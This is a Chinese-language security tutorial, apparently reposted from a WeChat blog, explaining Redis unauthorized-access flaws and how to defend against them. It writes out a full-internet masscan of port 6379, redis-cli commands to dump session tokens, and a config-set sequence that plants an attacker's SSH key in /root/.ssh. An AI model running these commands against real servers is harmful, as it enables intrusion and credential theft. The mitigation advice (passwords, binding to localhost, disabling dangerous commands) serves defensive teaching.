🧠 一句话解释什么是“Redis 未授权访问”?
Redis 未授权访问漏洞指的是:
Redis 服务没设置密码(或防护配置),任何人都能连上它,执行任何命令,就像你的冰箱门没关,谁都能进去拿东西,甚至放炸弹。
🏗️ Redis 是什么?(你得知道它干啥)
Redis 是一个超快的键值数据库,开发者用它来:
-
存储用户会话(session) -
缓存数据 -
存用户登录状态 -
存验证码、Token -
分布式锁 等等…
它跑在默认端口 6379,可以用 redis-cli
连上,也可以远程连接(如果没关防火墙)
💣 红队怎么发现目标 Redis 没授权?
🧑💻 黑客视角流程如下:
第一步:全网扫描
使用工具批量扫开放 6379 端口的 Redis 主机:
masscan -p 6379 0.0.0.0/0 --rate=100000
第二步:验证是否需要认证
连接 Redis:
redis-cli -h x.x.x.x -p 6379
若返回:
127.0.0.1:6379>
说明没设密码,就等于:未授权访问 ✅ 成功进入!
🛠️ 利用方式(小白秒懂):
🧨 场景1:获取敏感信息
keys *get session:admin_token
能直接获取登录态、验证码、用户 Token、邮箱等!
🧨 场景2:写文件 → 提权 / 获取服务器控制权
Redis 支持保存数据到硬盘上,黑客可以利用这个:
config set dir /root/.ssh/config set dbfilename authorized_keysset x "nn攻击者的ssh公钥nn"save
☠️ 攻击者可以直接用 SSH 登录服务器,无需密码!
🧨 场景3:反弹 Shell / 挖矿 / 横向移动
将 Redis 当作跳板机,比如写定时任务、写反弹脚本、挂马页、部署挖矿木马……
🚨 实战案例(真实发生)
🎯 某教育 SaaS 平台
-
Redis 未授权开放公网 -
攻击者 dump 出 session,登录后台 -
后台支持命令执行,成功横向到内网控制多台服务器 -
最终挖矿+数据勒索+Git 泄露
🛡️ 防护措施(小白照做就行)
|
|
---|---|
|
redis.conf 添加:requirepass StrongPassword123! |
|
|
|
CONFIG , FLUSHALL , SAVE 等危险命令 |
|
bind 127.0.0.1 或 bind 内网IP 写入配置 |
|
|
|
|
🚀 彩蛋:一行命令检测自己是否存在风险
redis-cli -h 127.0.0.1 ping
如果返回:
PONG
说明 Redis 正常且没要求认证,如果你能远程连上,就危险了!
✅ 总结一句话:
Redis 就像一把钥匙串,未授权就是把钥匙丢在马路上,攻击者不仅能进门,还能翻你抽屉、换门锁、住你家,一定要上锁!
原文始发于微信公众号(季升安全):Redis未授权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论